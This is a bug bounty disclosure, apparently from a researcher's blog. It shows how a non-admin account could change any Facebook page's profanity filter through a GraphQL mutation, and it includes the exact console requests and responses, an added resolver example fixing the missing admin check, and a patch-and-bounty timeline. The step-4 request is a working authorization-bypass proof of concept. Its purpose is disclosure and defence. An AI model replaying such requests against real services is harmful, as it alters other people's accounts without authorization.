
Change the profanity filter for any Facebook page

 3 years ago
source link: https://philippeharewood.com/change-the-profanity-filter-for-any-facebook-page/

Facebook seems to have recently introduced an option to change the filter for profane comments. It’s possible as a non-admin to change this for any page.

1. Log in as AdminOne

2. Observe the response to the following request, which can be run in the console

new AsyncRequest('/api/graphql').setData({doc_id: 3152386011505033,variables:"{videoID: 1}"}).send()
{"data":{"video":{"id":"1","broadcast_blocked_users":[],"broadcast_suspended_users_info":{"edges":[]},"broadcast_id":null,"owner":{"__typename":"Page","__isProfile":"Page","id":"113702895386410","profanity_filter_id":"FILTER_OFF"}}},"extensions":{"is_final":true,"live_query":{"response_digest":"1","priming_token":"1"}}}

This requests the video and the current profanity filter. Trying to request the field manually (?q=node(ID)) seems to block me with code: 1675036 as Facebook has blocked arbitrary GraphQL requests globally (May 2020).

3. Log in as AttackerOne

4. Execute the following request from the console in the AttackerOne session

new AsyncRequest('/api/graphql').setData({doc_id:2775555902540880,variables:"{input:{actor_id: 2, client_mutation_id:0,page_id: 113702895386410,profanity_setting:'FILTER_MEDIUM'}}"}).send()

5. Recheck the query from step 2 as AdminOne

{"data":{"video":{"id":"1","broadcast_blocked_users":[],"broadcast_suspended_users_info":{"edges":[]},"broadcast_id":null,"owner":{"__typename":"Page","__isProfile":"Page","id":"113702895386410","profanity_filter_id":"FILTER_MEDIUM"}}},"extensions":{"is_final":true,"live_query":{"response_digest":"1","priming_token":"1"}}}

The filter was changed.
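The steps above succeed because the mutation acted on a client-supplied page_id without confirming that the logged-in user administers that page. As an added example (not from the original post and not Facebook's code), here is a toy in-memory resolver with the missing check beside a corrected version; the function names, session shape and error codes are assumptions.

```javascript
// Added example: toy in-memory model, not Facebook's implementation.
// Constructed sample data; the page ID and filter values are the ones shown in the write-up.
const pages = new Map([
  ['113702895386410', { admins: new Set(['AdminOne']), profanityFilter: 'FILTER_OFF' }],
]);
// Only the two settings visible in the write-up; a real schema may define more.
const ALLOWED_SETTINGS = new Set(['FILTER_OFF', 'FILTER_MEDIUM']);

// Before: trusts page_id from the client and never checks who the session user is.
function setProfanityFilterUnchecked(session, input) {
  const page = pages.get(String(input.page_id));
  if (!page) return { ok: false, error: 'NOT_FOUND' };
  page.profanityFilter = input.profanity_setting;
  return { ok: true };
}

// After: the actor comes from the authenticated session, never from input.actor_id,
// and the write happens only if that actor administers the target page.
function setProfanityFilter(session, input) {
  if (!session || !session.userId) return { ok: false, error: 'UNAUTHENTICATED' };
  if (!ALLOWED_SETTINGS.has(input.profanity_setting)) return { ok: false, error: 'BAD_INPUT' };
  const page = pages.get(String(input.page_id));
  // Same error for "missing" and "not yours" so the endpoint does not confirm page IDs.
  if (!page || !page.admins.has(session.userId)) return { ok: false, error: 'FORBIDDEN' };
  page.profanityFilter = input.profanity_setting;
  return { ok: true };
}

function currentFilter(pageId) {
  return pages.get(String(pageId)).profanityFilter;
}

// Replays the mutation input from step 4 against the corrected resolver.
function demo() {
  const attempt = { actor_id: 2, page_id: 113702895386410, profanity_setting: 'FILTER_MEDIUM' };
  const asAttacker = setProfanityFilter({ userId: 'AttackerOne' }, attempt);
  const afterAttacker = currentFilter(attempt.page_id);
  const asAdmin = setProfanityFilter({ userId: 'AdminOne' }, attempt);
  return { asAttacker, afterAttacker, asAdmin, afterAdmin: currentFilter(attempt.page_id) };
}

console.log(demo());
```

A regression test for this class of bug replays every page-scoped mutation from a second, unprivileged account and asserts that the stored setting is unchanged.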

Impact (A verbatim explanation of the bounty by Facebook):

it’s possible to set the profanity filter for any page via graphql.

Timeline

May 12, 2020 – Report sent
May 12, 2020 – Confirmation of submission by Facebook
May 15, 2020 – Confirmation of patch by Facebook
Jun 4, 2020 – $750 Bounty awarded by Facebook

